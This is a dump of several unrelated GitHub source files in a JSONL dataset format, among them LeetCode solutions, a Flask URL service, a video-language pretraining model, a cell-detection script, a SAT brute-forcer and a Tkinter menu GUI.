alias: seth\nturtle.setheading(to_angle=90)\n'''\n\n\n\n\nturtle.done()\n","repo_name":"wangxuhe/Python","sub_path":"_turtle/_turtlefunc.py","file_name":"_turtlefunc.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21298736085","text":"from typing import Optional\n\n\n# Definition for singly-linked list.\nclass ListNode:\n    def __init__(self, val=0, next=None):\n        self.val = val\n        self.next = next\n\n# case 1: walk to the end, collect every value in a list, then compare it with its reverse\nclass Solution:\n    def isPalindrome(self, head: Optional[ListNode]) -> bool:\n        node2list = []\n        while head:\n            node2list.append(head.val)\n            head = head.next\n        if node2list == node2list[::-1]:\n            return True\n        else:\n            return False\n\n# case 2 : Reversed first half == Second half?\n\n\"\"\"\nPhase 1: Reverse the first half while finding the middle.\nPhase 2: Compare the reversed first half with the second half.\n*link: https://leetcode.com/explore/interview/card/top-interview-questions-easy/93/linked-list/772/discuss/64500/11-lines-12-with-restore-O(n)-time-O(1)-space\n\"\"\"\nclass Solution:\n    def isPalindrome(self, head: Optional[ListNode]) -> bool:\n        rev = None\n        slow = fast = head\n        while fast and fast.next:\n            fast = fast.next.next\n            rev, rev.next, slow = slow, rev, slow.next\n        if fast:\n            slow = slow.next\n        while rev and rev.val == slow.val:\n            slow = slow.next\n            rev = rev.next\n        return not rev\n
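\n# Worked trace of the in-place reversal above (an illustrative note, not from the original solution):\n# for 1 -> 2 -> 2 -> 1 the first loop leaves rev = 2 -> 1 (the reversed first half) and\n# slow = 2 -> 1 (the second half); the final loop then walks both in lockstep, so rev ends\n# as None and `not rev` is True exactly when every value matched.\n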
","repo_name":"jarammm/TIL","sub_path":"Algorithm/LinkedList/Palindrome Linked List.py","file_name":"Palindrome Linked List.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40732372089","text":"import csv\nfrom typing import Dict\n\n\nclass CSVCustom:\n\n    def __init__(self, file_path: str, fieldnames: list = None):\n        self.file_path = file_path\n        self.file = None\n        self.fieldnames = fieldnames\n\n    def __enter__(self):\n        try:\n            self.file = csv.DictReader(open(self.file_path))\n        except FileNotFoundError:\n            self.file = csv.DictWriter(open(self.file_path, 'w'), fieldnames=self.fieldnames)\n            self.file.writeheader()\n        finally:\n            if not self.file:\n                raise\n        return self\n\n    def __exit__(self, exc_type, exc_val, exc_tb):\n        pass\n\n    def read_row(self) -> Dict[str, str]:\n        if isinstance(self.file, csv.DictWriter):\n            raise RuntimeError(\"Can't read while the file is open in write mode.\")\n        yield from self.file\n\n    def write_row(self, row: Dict[str, str]):\n        if isinstance(self.file, csv.DictReader):\n            raise RuntimeError(\"Can't write while the file is open in read mode.\")\n        self.file.writerow(row)\n","repo_name":"senavs/GooApple","sub_path":"utils/context_csv.py","file_name":"context_csv.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"7391215442","text":"\"\"\"Does url processing.\"\"\"\n# pylint: disable=W0312\nimport os\nfrom flask import Flask\nfrom flask import request\nfrom identifyurl import Identify\n\n# check if logger is enabled\nLOG_ENABLE = os.environ[\"DEPLOYED\"] if \"DEPLOYED\" in os.environ else ''\n\nif LOG_ENABLE == \"1\":\n\tfrom logger import Logger\n\tLOG = Logger(os.getenv('LOGGER_ADDR'))\n\n\napp = Flask(__name__)\n@app.route('/extract_page', methods=['POST'])\ndef processurl():\n\t\"\"\"Processes the url as html or pdf. Arg: data => input json object with url.\"\"\"\n\tdata = request.get_json(force=True)\n\t# print(data)\n\turl = data['url']\n\t# pdf has the routes to the pdf parser\n\tpdf = {'pdf_upload' : data['pdf_upload'], 'pdf_parser' : data['pdf_parser']}\n\t# print('hello')\n\tif LOG_ENABLE == \"1\":\n\t\tLOG.info('url_processing', 'POST', 'NULL', 'NULL', 'URL processed successfully')\n\tresult = Identify(url, pdf).classify_url()\n\treturn result\n\n@app.route('/')\ndef hello():\n\t\"\"\"Hello world.\"\"\"\n\treturn \"hello world from url_processing\"\n\nif __name__ == '__main__':\n\tapp.run('0.0.0.0', debug=True, port=80)\n","repo_name":"sravani-kaza/BTP_1","sub_path":"url_processing/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20259255462","text":"from locale import LC_NUMERIC\nfrom src.models.bert import (\n BertConfig, BertModel, BertOnlyMLMHead, BertOnlyNSPHead, BertForMaskedLM)\nfrom src.models.video_encoder import SwinTransformer3D\nfrom src.models.text_encoder import TextEncoderForPretraining\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn\nimport numpy as np\nimport random\nimport einops\nfrom src.utils.logger import LOGGER\nfrom src.utils.dist import SyncFunction\nfrom src.utils.misc import vector_gather\nfrom timm.models.vision_transformer import Block\n\n\nclass VideoTokenPos(nn.Module):\n def __init__(self,num_patches=6, num_frames=32, hidden_size=768):\n super().__init__()\n self.s_pos_embed = nn.Parameter(0.02*torch.randn(1, 1, num_patches, hidden_size), requires_grad=True)\n self.t_pos_embed = nn.Parameter(0.02*torch.randn(1, num_frames, 1, hidden_size), requires_grad=True)\n self.norm = nn.LayerNorm(hidden_size)\n\n def forward(self, video_embd):\n video_embd = video_embd + self.s_pos_embed + self.t_pos_embed\n video_embd = 
self.norm(video_embd)\n return video_embd\n\nclass SentEmbedding(nn.Module):\n def __init__(self, cfg):\n super().__init__()\n self.embed_dim = cfg.hidden_size\n self.position_embeddings = nn.Embedding(cfg.max_position_embeddings, cfg.hidden_size)\n self.segment_embeddings = nn.Embedding(cfg.type_vocab_size, cfg.hidden_size)\n self.norm = nn.LayerNorm(cfg.hidden_size, eps=cfg.layer_norm_eps)\n self.dropout = nn.Dropout(cfg.hidden_dropout_prob)\n self.register_buffer(\"position_ids\", torch.arange(cfg.max_position_embeddings).expand((1, -1)))\n\n def forward(self, inputs_embeds, token_type_ids):\n segment_embeddings = self.segment_embeddings(token_type_ids) # B, N, C\n seq_length = inputs_embeds.shape[1]\n position_ids = self.position_ids[:, :seq_length]\n position_embeddings = self.position_embeddings(position_ids)\n embeddings = inputs_embeds + position_embeddings + segment_embeddings\n embeddings = self.norm(embeddings)\n embeddings = self.dropout(embeddings)\n return embeddings\n\n\nclass LFVILA_Pretrain(nn.Module):\n def __init__(self, args, config):\n super().__init__()\n self.cfg = config\n self.args = args\n self.video_encoder = SwinTransformer3D(**config.VideoEncoder)\n bert_config = BertConfig.from_json_file(config.bert_config)\n setattr(bert_config,'stage',config.stage)\n setattr(bert_config,'num_local_layers',config.num_local_layers)\n setattr(bert_config,'stage1_layers',config.stage1_layers)\n setattr(bert_config,'bert_frozen_stage',config.bert_frozen_stage)\n self.text_encoder = TextEncoderForPretraining(args, config=bert_config)\n self.video_downsample = nn.MaxPool2d((2,3), stride=(1,1))\n\n self.video_local_proj = nn.Linear(bert_config.hidden_size, bert_config.hidden_size)\n self.text_local_proj = nn.Linear(bert_config.hidden_size, bert_config.hidden_size)\n\n self.video_global_proj = nn.Linear(bert_config.hidden_size, bert_config.hidden_size)\n self.text_global_proj = nn.Linear(bert_config.hidden_size, bert_config.hidden_size)\n\n if config.stage == 2:\n self._freeze_stage_one_params()\n self.video_token_pos = VideoTokenPos(num_patches=config.final_num_patches,\n num_frames=config.DATA.sample_frame,\n hidden_size=bert_config.hidden_size)\n\n setattr(bert_config,'type_vocab_size',config.type_vocab_size)\n self.sent_embedding = SentEmbedding(bert_config)\n\n def _init_sent_embedding(self):\n self.sent_embedding.position_embeddings.weight.data.copy_(self.text_encoder.bert.embeddings.position_embeddings.weight.data)\n\n def _freeze_stage_one_params(self):\n freeze_modules = [\"video_encoder\", \"video_local_proj\", \"text_local_proj\", \"video_global_proj\", \"text_global_proj\", \"sent_embedding\"]\n for i in freeze_modules:\n m = getattr(self, i)\n m.eval()\n for param in m.parameters():\n param.requires_grad = False\n\n for m in [self.text_encoder.bert.embeddings]:\n m.eval()\n for param in m.parameters():\n param.requires_grad = False\n\n for i in range(0, 12):\n m = self.text_encoder.bert.encoder.layer[i]\n m.eval()\n for param in m.parameters():\n param.requires_grad = False\n\n def ct_global_loss(self, video_feat, text_feat):\n temp = self.cfg.TRAINING.temp\n t2v = torch.matmul(video_feat, text_feat.permute(1, 0)) / temp # temperature\n v2t = t2v.permute(1, 0)\n t2v_label = torch.arange(t2v.shape[0], device=t2v.device)\n v2t_label = t2v_label\n loss = (F.cross_entropy(t2v, t2v_label) + F.cross_entropy(v2t, v2t_label)).mean()\n return loss\n\n def ct_time_loss(self, video_local_feat,text_local_feat):\n b,m,c = video_local_feat.shape\n temp = self.cfg.TRAINING.time_temp\n 
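# Shape sketch for the sampling below (assuming vector_gather(x, idx)[b] == x[b, idx[b]], per src.utils.misc):\n # key_indices (B, num_key) draws random temporal positions used as queries, value_indices (B, num_value)\n # draws candidate positions; e.g. with m=8, key=[5, 1] and value=[2, 7, 0, 4], the positive for key 5 is\n # the candidate minimizing |5 - v| (here v=4), which is what the argmin over |value - key| below encodes.\n 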
num_key = self.cfg.TRAINING.num_key\n num_value = self.cfg.TRAINING.num_value\n num_other_neg=self.cfg.TRAINING.num_other_neg\n \n key_indices = torch.cat([torch.randperm(m).unsqueeze(0) for x in range(b)],dim=0)[:,:num_key].to(text_local_feat.device)\n value_indices = torch.cat([torch.randperm(m).unsqueeze(0) for x in range(b)],dim=0)[:,:num_value].to(text_local_feat.device)\n text_key_feat = vector_gather(text_local_feat, key_indices) \n video_value_feat = vector_gather(video_local_feat, value_indices)\n\n if num_other_neg > 0:\n other_neg_indices = torch.cat([torch.randperm(m).unsqueeze(0) for x in range(b)],dim=0)[:,0].to(text_local_feat.device)\n video_other_neg = vector_gather(video_local_feat, other_neg_indices)\n video_other_neg = torch.cat([video_other_neg.roll(shifts=x, dims=0).unsqueeze(1) for x in range(num_other_neg)],dim=1)\n video_value_feat = torch.cat([video_value_feat, video_other_neg],dim=1)\n\n sim_t2v = torch.matmul(text_key_feat, video_value_feat.permute(0,2,1)).flatten(0,1) / temp\n\n t2v_label = ((value_indices.unsqueeze(1) - key_indices.unsqueeze(2))).abs().argmin(dim=-1).flatten(0,1)\n\n minus = ((value_indices.unsqueeze(1) - key_indices.unsqueeze(2))).abs()\n mask = ((minus[:,:,0] - minus[:,:,-1]) == 0 ).flatten(0,1)\n t2v_label = t2v_label.masked_fill_(mask, -100)\n \n video_key_feat = vector_gather(video_local_feat, key_indices) \n text_value_feat = vector_gather(text_local_feat, value_indices)\n\n if num_other_neg > 0:\n text_other_neg = vector_gather(text_local_feat, other_neg_indices)\n text_other_neg = torch.cat([text_other_neg.roll(shifts=x, dims=0).unsqueeze(1) for x in range(num_other_neg)],dim=1)\n text_value_feat = torch.cat([text_value_feat, text_other_neg],dim=1)\n\n sim_v2t = torch.matmul(video_key_feat, text_value_feat.permute(0,2,1)).flatten(0,1) / temp\n\n v2t_label = t2v_label\n\n loss = (F.cross_entropy(sim_t2v, t2v_label) + F.cross_entropy(sim_v2t, v2t_label)).mean()\n \n return loss\n\n\n def downsample_video_embd(self, video_embd):\n sample_clip = self.cfg.DATA.sample_clip\n B, N, H, W, C = video_embd.size() # B, N, H, W, C\n video_embd = video_embd.permute(0,1,4,2,3)\n video_embd = self.video_downsample(video_embd.view(B*N, C, H, W))\n video_embd = video_embd.permute(0,2,3,1) # B*N, H, W, C\n video_embd = video_embd.view(B, N, video_embd.size(-3), video_embd.size(-2),video_embd.size(-1))\n video_embd = video_embd.flatten(2,3) # B, N, X, C\n\n video_feat = video_embd.view(B, sample_clip, int(N/sample_clip), -1, C)\n video_feat = video_feat.mean(dim=[2,3])\n\n return video_feat, video_embd\n\n def shuffle_embd_for_vtm(self, video_embd):\n B, L, C = video_embd.shape\n video_embd_neg = torch.roll(video_embd[:(B//2)],1,0)\n video_embd = torch.cat([video_embd_neg, video_embd[(B//2):]], dim=0)\n vtm_label = torch.cat([torch.zeros((B//2),device=video_embd.device,dtype=torch.long), torch.ones((B-B//2),device=video_embd.device,dtype=torch.long)])\n return video_embd, vtm_label\n\n\n def forward(self, video_frames, text_ids, \n attention_mask, mlm_labels = None, \n stage=2,is_train=True,is_pretrain_val=False):\n\n # extract video feature\n B, C, N, H, W = video_frames.size()\n video_global_embd, video_local_embd = self.video_encoder(video_frames) # B, N, H, W, C\n\n video_local_feat1, _ = self.downsample_video_embd(video_local_embd)\n video_local_feat2, video_stage1_embd = self.downsample_video_embd(video_global_embd)\n\n # extract text feature\n B,M,L = text_ids.shape\n text_local_embd = self.text_encoder(text_ids.view(B*M, L), 
attention_mask=attention_mask.view(B*M, L), return_dict=True, stage=0).view(B, M, L, -1) # B, M, L, C\n\n if stage == 1:\n\n text_local_feat = text_local_embd[:,:,0,:] # B, M, C\n video_local_feat = F.normalize(self.video_local_proj(video_local_feat1),dim=-1)\n text_local_feat = F.normalize(self.text_local_proj(text_local_feat),dim=-1)\n else:\n video_local_feat, text_local_feat = None, None\n\n B,M,L,C = text_local_embd.shape\n\n text_segment_id = torch.arange(M, device=text_local_embd.device).repeat(B,1).repeat_interleave(L,dim=1)# B, N\n text_local_embd = self.sent_embedding(text_local_embd.view(B,M*L,-1), text_segment_id)\n\n text_local_cls = text_local_embd.view(B,M,L,-1)[:,:,0,:].mean(dim=1) # B,C\n text_global_embd = torch.cat([text_local_cls.unsqueeze(1),text_local_embd], dim=-2) # b, 1+M*L, c\n attention_mask = torch.cat([torch.tensor([1.],dtype=attention_mask.dtype, device=attention_mask.device).repeat(B,1),attention_mask.view(B,M*L)], dim=-1) # b, 1+M*L\n text_global_embd = self.text_encoder(text_global_embd, attention_mask=attention_mask, return_dict=True, stage=1) # B, 1+M*L, C\n \n if stage == 1:\n text_global_feat = text_global_embd[:,0,:] # B, C\n video_global_feat = video_local_feat2.mean(dim=1)\n\n video_global_feat = F.normalize(self.video_global_proj(video_global_feat),dim=-1)\n text_global_feat = F.normalize(self.text_global_proj(text_global_feat),dim=-1)\n\n else:\n text_global_feat, video_global_feat = None, None\n\n if stage == 1:\n if self.args.distributed:\n text_global_feat = SyncFunction.apply(text_global_feat)\n video_global_feat = SyncFunction.apply(video_global_feat)\n\n if self.cfg.TRAINING.use_time_match:\n text_local_feat = SyncFunction.apply(text_local_feat)\n video_local_feat = SyncFunction.apply(video_local_feat) \n\n ct_global_loss, ct_time_loss = 0, 0\n if is_train or is_pretrain_val:\n if stage == 1:\n ct_global_loss = self.ct_global_loss(video_global_feat, text_global_feat)\n weight=self.cfg.TRAINING.ct_global_loss_weight\n ct_global_loss = weight*ct_global_loss\n\n if self.cfg.TRAINING.use_time_match:\n ct_time_loss = self.ct_time_loss(text_local_feat,video_local_feat)\n weight=self.cfg.TRAINING.ct_time_loss_weight\n ct_time_loss = weight*ct_time_loss\n\n if stage == 1:\n \n return dict(text_global_feat = text_global_feat,\n video_global_feat = video_global_feat,\n ct_global_loss = ct_global_loss,\n ct_time_loss = ct_time_loss,\n mlm_loss=0,\n vtm_loss=0,\n mlm_prediction=0,\n mlm_acc = 0,\n vtm_acc = 0\n )\n\n video_stage1_embd = self.video_token_pos(video_stage1_embd)\n\n video_stage1_embd = video_stage1_embd.flatten(1,2)\n\n visual_attention_mask = attention_mask.new_ones(\n video_stage1_embd.shape[:2])\n attention_mask = torch.cat(\n [attention_mask, visual_attention_mask], dim=-1)\n\n\n video_stage1_embd, vtm_labels = self.shuffle_embd_for_vtm(video_stage1_embd)\n\n stage1_embedding_output = torch.cat([text_global_embd, video_stage1_embd], dim=1)\n\n mlm_labels = torch.cat([-100*mlm_labels.new_ones(mlm_labels.shape[:1]).unsqueeze(1), mlm_labels, -100*mlm_labels.new_ones(video_stage1_embd.shape[:2])], dim=1)\n\n fusion_output = self.text_encoder(stage1_embedding_output, attention_mask=attention_mask, mlm_labels = mlm_labels, vtm_labels=vtm_labels, return_dict=True, stage=2)\n\n\n mlm_loss = self.cfg.TRAINING.mlm_loss_weight * fusion_output['mlm_loss']\n mlm_acc = fusion_output['mlm_acc']\n mlm_prediction = fusion_output['mlm_logits']\n vtm_acc = fusion_output['vtm_acc']\n vtm_loss = self.cfg.TRAINING.vtm_loss_weight * 
fusion_output['vtm_loss']\n\n return dict(mlm_loss=mlm_loss,\n vtm_loss=vtm_loss,\n mlm_prediction=mlm_prediction,\n mlm_acc = mlm_acc,\n vtm_acc = vtm_acc,\n ct_global_loss = 0.,\n ct_time_loss = 0.,\n )\n \n\n","repo_name":"microsoft/XPretrain","sub_path":"LF-VILA/src/models/lfvila_pretrain.py","file_name":"lfvila_pretrain.py","file_ext":"py","file_size_in_byte":13580,"program_lang":"python","lang":"en","doc_type":"code","stars":369,"dataset":"github-code","pt":"77"} +{"seq_id":"16611583177","text":"import os\nimport shutil\n\n\nif __name__ == \"__main__\":\n processed_path = \"./DL_test\"\n base_path = \"./DL_data\"\n val_txt_path = base_path + \"/val.txt\"\n\n with open(val_txt_path) as f:\n lines = f.readlines()\n for i, line in enumerate(lines):\n img_name, label = line.split(\" \")\n\n label = label.replace(\"\\n\",\"\")\n\n img_dir_path = processed_path + \"/\" + label\n img_src_path = base_path + \"/test_images/\" + img_name\n img_dst_path = img_dir_path + \"/\" + img_name\n if not os.path.isdir(img_dir_path):\n os.mkdir(img_dir_path)\n\n shutil.copyfile(img_src_path, img_dst_path)\n\n\n\n","repo_name":"divanoLetto/Explicability-of-decisions-and-uncertainty-in-Deep-Learning","sub_path":"dataset/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43703568551","text":"# Detects cells in the specified frames.\n# Standard imports\nimport cv2\nimport numpy as np\nimport scipy\nimport scipy.ndimage.measurements as measurements\nimport sys\nimport os\nimport getopt\nfrom video_capture_function import *\nfrom detector_function import *\nfrom background_remover_function import *\nfrom track_cells import *\nimport pandas as pd\n\ndef usage():\n script = os.path.basename(__file__)\n print(\"\\n\\nUsage: \" + script + \" [options] \")\n print('''\n Options:\n -h --help (help)\n -w --minboxweight (bounding boxes below minboxweight * (averagebox size) area deleted)\n\n -n --windowsize (resolution of background removal in terms of pixel size)\n -b --blocksize (region at which local threshold is calculated)\n -c --subtractedconstant (constant value subtracted from threshold value in gaussian adaptive threshold)\n -r --backgroundrelative (default 0, signifying a dark background. If background is lighter than cells, input 1)\n\n -t --tuningmode (if tuning background remover, input 'True')\n\n (e.g. ~/input.avi)\n (e.g. 
~/output.mp4)\n ''')\n sys.exit()\n\ndef main():\n\n opts, files = getopt.getopt(sys.argv[1:], \"h:w:n:b:c:r:t:\", [ \"help\", \"minboxweight\",\"windowsize\", \"blocksize\", \"subtractedconstant\", \"backgroundrelative\", \"tuningmode\"])\n\n if len(files) != 2:\n usage()\n\n # defaults:\n parameters = {}\n parameters['w'] = 0.3\n parameters['n'] = 1\n parameters['b'] = 1001\n parameters['c'] = 0\n parameters['r'] = 0\n parameters['t'] = False\n\n # loop over options:\n for option, argument in opts:\n if option in (\"-h\", \"--help\"):\n usage()\n elif option in (\"-w\", \"--minboxweight\"):\n parameters['w'] = argument\n if float(parameters['w']) <= 0:\n usage()\n elif option in (\"-n\", \"--windowsize\"):\n parameters['n'] = argument\n elif option in (\"-b\", \"--blocksize\"):\n parameters['b'] = argument\n elif option in (\"-c\", \"--subtractedconstant\"):\n parameters['c'] = argument\n elif option in (\"-r\", \"--backgroundrelative\"):\n parameters['r'] = argument\n elif option in (\"-t\", \"--tuningmode\"):\n parameters['t'] = argument\n\n # split path\n base = os.path.basename(files[0])\n input_picture_name, input_picture_extension = os.path.splitext(base)\n output_path = files[1]\n output_picture_directory, output_picture_extension = os.path.splitext(files[1])\n\n # parameters (plain float/int, since np.float and np.int were removed from recent numpy)\n min_box_weight = float(parameters['w'])\n n = int(parameters['n'])\n b = int(parameters['b'])\n c = float(parameters['c'])\n background_relative = int(parameters['r'])\n tuning_mode = False\n if parameters['t'] in ['True', 'true']:\n tuning_mode = True\n\n # write images into a folder\n print('converting video to images...')\n im_list = store_images(files[0], output_picture_directory)\n im_list = im_list[:int(len(im_list)/45)]\n\n # remove background\n # input_folder = os.path.dirname(output_picture_directory)\n print('removing background...')\n mask_list = remove_background_a2a(n, b, c, background_relative, im_list)\n if tuning_mode:\n write_video(mask_list, files[1])\n sys.exit()\n return\n\n # run detection on all frames\n print('detecting cells...')\n total_boxes = detect_frames(min_box_weight, output_picture_directory, images_array = mask_list, num_frames = len(im_list))\n # draw boxes on gray scale\n for frame_index, frame in enumerate(im_list):\n f = total_boxes['frame ' + str(frame_index)]\n boxes = []\n for box in f:\n box = (f[box]['x'], f[box]['y'], f[box]['width'], f[box]['height'])\n boxes.append(box)\n\n # draw\n for index, new_box in enumerate(boxes):\n # access box elements and draw\n p1 = (int(new_box[0]), int(new_box[1])) # point 1 of new box\n p2 = (int(new_box[0] + new_box[2]), int(new_box[1] + new_box[3])) # point 2 of box\n cv2.rectangle(frame, p1, p2, (255,255,255), 2, 1)\n cv2.putText(frame, str(index), (p1[0],p1[1]-10), cv2.FONT_HERSHEY_SIMPLEX, 0.3, (255,255,255), 1)\n\n # write the current frame of the video\n if output_path is not None:\n cv2.imwrite(output_picture_directory + 'frame_' + str(frame_index) + '.png', frame)\n\n # write bounding box frame information\n with open(output_picture_directory + '_fframe.txt', 'w') as f:\n f.write(\"%s\\n\" % total_boxes)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"wongrp/chemotaxis_tracker_opencv","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":4808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29447424015","text":"# Description\n# Given a string S with only lowercase characters.\n\n# Return the number of substrings that contain at least k distinct characters.\n\n# 10 ≤ length(S) ≤ 1,000,000\n# 1 ≤ k ≤ 26\n# Example\n# Example 1:\n\n# Input: S = \"abcabcabca\", k = 4\n# Output: 0\n# Explanation: There are only three distinct characters in the string.\n# Example 2:\n\n# Input: S = \"abcabcabcabc\", k = 3\n# Output: 55\n# Explanation: Any substring whose length is not smaller than 3 contains a, b, c.\n# For example, there are 10 substrings whose length is 3, \"abc\", \"bca\", \"cab\" ... \"abc\"\n# There are 9 substrings whose length is 4, \"abca\", \"bcab\", \"cabc\" ... \"cabc\"\n# ...\n# There is 1 substring whose length is 12, \"abcabcabcabc\"\n# So the answer is 1 + 2 + ... + 10 = 55.\n\nclass Solution:\n    \"\"\"\n    @param s: a string\n    @param k: an integer\n    @return: the number of substrings there are that contain at least k distinct characters\n    \"\"\"\n    def k_distinct_characters(self, s: str, k: int) -> int:\n        char_count = {}\n        fast = 0\n        total = 0\n\n        for slow in range(len(s)):\n            while len(char_count) < k and fast < len(s):\n                curr_char = s[fast]\n                char_count[curr_char] = char_count.get(curr_char, 0) + 1\n                fast += 1\n\n            if len(char_count) == k:\n                total += (len(s) - 1) - (fast - 1) + 1\n\n            char_count[s[slow]] -= 1\n            if char_count[s[slow]] == 0:\n                del char_count[s[slow]]\n\n        return total\n
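\n# Quick check of the counting step above (illustrative usage, not part of the original solution):\n# for each left pointer slow, (len(s) - 1) - (fast - 1) + 1 == len(s) - fast + 1 counts every\n# substring s[slow:j] with j >= fast, i.e. every window that already holds k distinct characters.\n# Solution().k_distinct_characters(\"abcabcabcabc\", 3)  # -> 55\n# Solution().k_distinct_characters(\"abcabcabca\", 4)   # -> 0\n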
substrings that contain at least k distinct characters.\n\n# 10 ≤ length(S) ≤ 1,000,000\n# 1 ≤ k ≤ 26\n# Example\n# Example 1:\n\n# Input: S = \"abcabcabca\", k = 4\n# Output: 0\n# Explanation: There are only three distinct characters in the string.\n# Example 2:\n\n# Input: S = \"abcabcabcabc\", k = 3\n# Output: 55\n# Explanation: Any substring whose length is not smaller than 3 contains a, b, c.\n# For example, there are 10 substrings whose length are 3, \"abc\", \"bca\", \"cab\" ... \"abc\"\n# There are 9 substrings whose length are 4, \"abca\", \"bcab\", \"cabc\" ... \"cabc\"\n# ...\n# There is 1 substring whose length is 12, \"abcabcabcabc\"\n# So the answer is 1 + 2 + ... + 10 = 55.\n\nclass Solution:\n    \"\"\"\n    @param s: a string\n    @param k: an integer\n    @return: the number of substrings there are that contain at least k distinct characters\n    \"\"\"\n    def k_distinct_characters(self, s: str, k: int) -> int:\n        char_count = {}\n        fast = 0\n        total = 0\n\n        for slow in range(len(s)):\n            while len(char_count) < k and fast < len(s):\n                curr_char = s[fast]\n                char_count[curr_char] = char_count.get(curr_char, 0) + 1\n                fast += 1\n\n            if len(char_count) == k:\n                total += (len(s) - 1) - (fast - 1) + 1\n\n            char_count[s[slow]] -= 1\n            if char_count[s[slow]] == 0:\n                del char_count[s[slow]]\n\n        return total\n\n","repo_name":"jerry-jma/Data-Structure-and-Algorithm-Python3","sub_path":"Two_Pointers/Substring With At Least K Distinct Characters.py","file_name":"Substring With At Least K Distinct Characters.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"11664538793","text":"import pip\n\n\ndef install_packages(package):\n    pip.main(['install', package])\n\n\ntry:\n    import itertools\nexcept ImportError:\n    print('itertools is not installed, installing it now!')\n    install_packages('itertools')\n\n\nclass BruteForce:\n\n    sat = False\n    satDict = None\n\n    def __init__(self, clauses):\n        self.clauses = clauses\n\n    def getLiterals(self):\n        return set([abs(y) for x in self.clauses for y in x])\n\n    def solve(self):\n        literals = BruteForce.getLiterals(self)\n        n = len(literals)\n\n        for seq in itertools.product([True, False], repeat=n):\n            res = set([lit if boo else -lit for boo, lit in zip(seq, literals)])\n            if all([bool(set(x).intersection(res)) for x in self.clauses]):\n                self.sat, self.satDict = True, dict(zip(literals, seq))\n","repo_name":"JoseMAP-99/MultiSAT","sub_path":"Algos/BruteForce.py","file_name":"BruteForce.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"9601400144","text":"#GUI lib\r\nimport tkinter as tk\r\nfrom tkinter import *\r\nimport kelas\r\n\r\nclass i_jrs:\r\n    def f_p():\r\n        f_p = tk.Tk()\r\n        f_p.title(\"FR SYSTEM\")\r\n        f_p.geometry(\"360x360\")\r\n        # create Frame\r\n        wrapper_f_p = LabelFrame(f_p, text=\"Fakultas Psikologi\")\r\n        wrapper_f_p.pack(fill=\"both\", expand=\"yes\", padx=20, pady=10)\r\n        # create label Greeting\r\n        lbl_gp = tk.Label(wrapper_f_p, text=\"DAFTAR JURUSAN\")\r\n        lbl_gp.place(x=100, y=10)\r\n        # create btn\r\n        def f_psi():\r\n            kelas.kls_fp.psik()\r\n        btn_p = tk.Button(wrapper_f_p, text=\"PSIKOLOGI\", width=25, height=2, command=f_psi)\r\n        btn_p.place(x=60, y=50)\r\n        f_p.mainloop()\r\n\r\n    def f_s():\r\n        f_s = tk.Tk()\r\n        f_s.title(\"FR SYSTEM\")\r\n        f_s.geometry(\"360x360\")\r\n        # create Frame\r\n        wrapper_f_s = LabelFrame(f_s, 
text=\"Fakultas Sastra\")\r\n wrapper_f_s.pack(fill=\"both\", expand=\"yes\", padx=20, pady=10)\r\n # create label Greeting\r\n lbl_gs= tk.Label(wrapper_f_s, text=\"DAFTAR JURUSAN\")\r\n lbl_gs.place(x=100, y=10)\r\n # create btn\r\n def sast():\r\n kelas.kls_fs.sastra()\r\n btn_sasi = tk.Button(wrapper_f_s, text=\"SASTRA INGGRIS\", width=25, height=2, command=sast)\r\n btn_sasi.place(x=60, y=50)\r\n f_s.mainloop()\r\n\r\n def f_ikti():\r\n f_ikti = tk.Tk()\r\n f_ikti.title(\"FR SYSTEM\")\r\n f_ikti.geometry(\"360x360\")\r\n # pembutaan Frame\r\n wrapper_f_ikti = LabelFrame(f_ikti, text=\"Fakultas Ilmu Komputer dan Teknologi Informasi\")\r\n wrapper_f_ikti.pack(fill=\"both\", expand=\"yes\", padx=20, pady=10)\r\n # create label Greeting\r\n lbl_gikti = tk.Label(wrapper_f_ikti, text=\"DAFTAR JURUSAN\")\r\n lbl_gikti.place(x=100, y=10)\r\n # create btn\r\n def siin():\r\n kelas.kls_fikti.si()\r\n btn_si = tk.Button(wrapper_f_ikti, text=\"SISTEM INFORMASI\", width=25, height=2, command=siin)\r\n btn_si.place(x=60, y=50)\r\n\r\n def siko():\r\n kelas.kls_fikti.sk()\r\n btn_ik = tk.Button(wrapper_f_ikti, text=\"SISTEM KOMPUTER\", width=25, height=2, command=siko)\r\n btn_ik.place(x=60, y=100)\r\n f_ikti.mainloop()\r\n\r\n def f_ti():\r\n f_ti = tk.Tk()\r\n f_ti.title(\"FR SYSTEM\")\r\n f_ti.geometry(\"360x360\")\r\n # pembutaan Frame\r\n wrapper_f_ti = LabelFrame(f_ti, text=\"Fakultas Teknologi Industri\")\r\n wrapper_f_ti.pack(fill=\"both\", expand=\"yes\", padx=20, pady=10)\r\n # create label Greeting\r\n lbl_gfti = tk.Label(wrapper_f_ti,text=\"DAFTAR JURUSAN\")\r\n lbl_gfti.place(x=100,y=10)\r\n # create btn\r\n def industri():\r\n kelas.kls_fti.indus()\r\n btn_fp = tk.Button(wrapper_f_ti,text=\"TEKNIK INDUSTRI\", width=25, height=2, command=industri)\r\n btn_fp.place(x=60, y=50)\r\n def informatika():\r\n kelas.kls_fti.kls_inf()\r\n btn_fs = tk.Button(wrapper_f_ti,text=\"TEKNIK INFORMATIKA\", width=25, height=2, command=informatika)\r\n btn_fs.place(x=60, 